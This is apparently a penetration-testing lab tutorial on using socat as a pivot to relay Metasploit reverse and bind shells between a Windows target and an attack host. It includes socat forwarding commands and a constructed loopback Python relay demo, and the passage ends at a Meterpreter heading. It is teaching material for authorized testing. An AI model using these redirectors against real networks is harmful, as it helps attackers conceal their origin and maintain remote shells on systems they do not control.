Playing Pong with Socat
Socat Redirection with a Reverse Shell
Socat is a bidirectional relay tool that can create pipe sockets between two independent network channels without needing to use SSH tunneling.
We can start Metasploit's listener on our attack host using the same command mentioned in the last section, and start socat on the Ubuntu server. Socat will listen on port 8080 of the Ubuntu server (on an interface the Windows target can reach, not only loopback) and forward all the traffic to port 80 on our attack host (10.10.14.18).
We then create a payload for the Windows target that points at port 8080 of the Ubuntu server running socat, and start our multi/handler on the attack machine listening on port 80, the port socat forwards to.
We can test this by running our payload on the Windows host again. This time the connection arriving at the handler should come from the Ubuntu server, not from the Windows host, because socat opens a fresh connection to our attack host on the target's behalf.
Socat Redirection with a Bind Shell
Similar to the socat reverse shell redirector, we can also create a socat bind shell redirector. This differs from the reverse shell case, where the Windows server connects back to the Ubuntu server and the connection is redirected to our attack host.
In the case of bind shells, the Windows server starts a listener bound to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.
At the same time, we create a socat redirector on the Ubuntu server that listens for the incoming connection from a Metasploit bind handler and forwards it to the bind shell payload on the Windows target. The figure below illustrates the pivot.
Creating the Windows Payload
We can start a socat bind shell listener, which listens on port 8080 and forwards packets to port 8443 on the Windows server (172.16.5.19 is the Windows IP, and 8443 is the port the bind shell payload listens on). The bind handler on our attack host then targets the Ubuntu server's port 8080 rather than the Windows host directly.
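To make concrete what the reverse and bind shell redirectors above actually do, here is an added example, not code from the original page: a minimal socat-style TCP relay in Python. It models the standard invocations `socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80` (reverse shell redirector) and `socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443` (bind shell redirector), both of which are the same operation with a different target. The hosts, ports, and the `Relay`, `pump` and `run_demo` names are assumptions for illustration; the demo runs entirely on loopback with a constructed "handler" standing in for the Metasploit listener and a constructed "payload" standing in for the Windows side.

```python
import socket
import threading

# Constructed example (not the page's or socat's own code): a minimal
# bidirectional TCP relay that behaves like `socat TCP4-LISTEN:PORT,fork
# TCP4:HOST:PORT`. Every accepted client gets its own outbound connection
# to the target, and bytes are copied in both directions until EOF.


def pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF to the other side
        except OSError:
            pass


class Relay:
    """Listen on `listen`, forward each accepted connection to `target`."""

    def __init__(self, listen, target):
        self.target = target
        self.outbound = []  # local addresses of the relay's own connections to target
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(listen)
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:  # listener was closed
                return
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def _handle(self, client):
        # Like socat's `fork`: one fresh outbound connection per client.
        remote = socket.create_connection(self.target)
        self.outbound.append(remote.getsockname())
        up = threading.Thread(target=pump, args=(client, remote))
        down = threading.Thread(target=pump, args=(remote, client))
        up.start()
        down.start()
        up.join()
        down.join()
        client.close()
        remote.close()

    def close(self):
        try:
            self.sock.shutdown(socket.SHUT_RDWR)
        except OSError:
            pass
        self.sock.close()


def run_demo():
    """Constructed loopback walk-through of one relayed connection.

    Reverse shell mapping: handler = Metasploit listener on the attack host,
    Relay = socat on the Ubuntu pivot, connector = the Windows payload.
    Bind shell mapping: handler = bind shell listening on Windows,
    Relay = socat on the pivot, connector = the Metasploit bind handler.
    The relay logic is identical; only the target address differs.
    """
    handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    handler.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    handler.bind(("127.0.0.1", 0))
    handler.listen(1)
    seen = {}

    def serve_handler():
        conn, peer = handler.accept()
        seen["peer"] = peer  # the address the listener believes connected to it
        seen["request"] = conn.recv(4096)
        conn.sendall(b"ACK:" + seen["request"])
        conn.close()

    worker = threading.Thread(target=serve_handler, daemon=True)
    worker.start()

    relay = Relay(("127.0.0.1", 0), handler.getsockname())
    connector = socket.create_connection(("127.0.0.1", relay.port))
    connector.sendall(b"hello")
    reply = b""
    while True:
        chunk = connector.recv(4096)
        if not chunk:
            break
        reply += chunk
    worker.join(timeout=5)
    connector.close()
    relay.close()
    handler.close()
    return {"reply": reply, "handler_saw": seen["peer"], "relay_outbound": relay.outbound[0]}


if __name__ == "__main__":
    print(run_demo())
```

The check worth noticing is `handler_saw == relay_outbound`: the listener only ever sees the relay's own address, which is exactly why the original text expects the Metasploit handler to report a connection from the Ubuntu server rather than from the Windows host. The same property is what makes the bind shell variant work: the Metasploit bind handler talks to the pivot's port 8080, and the Windows bind shell sees a connection from the pivot.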
Establishing Meterpreter Session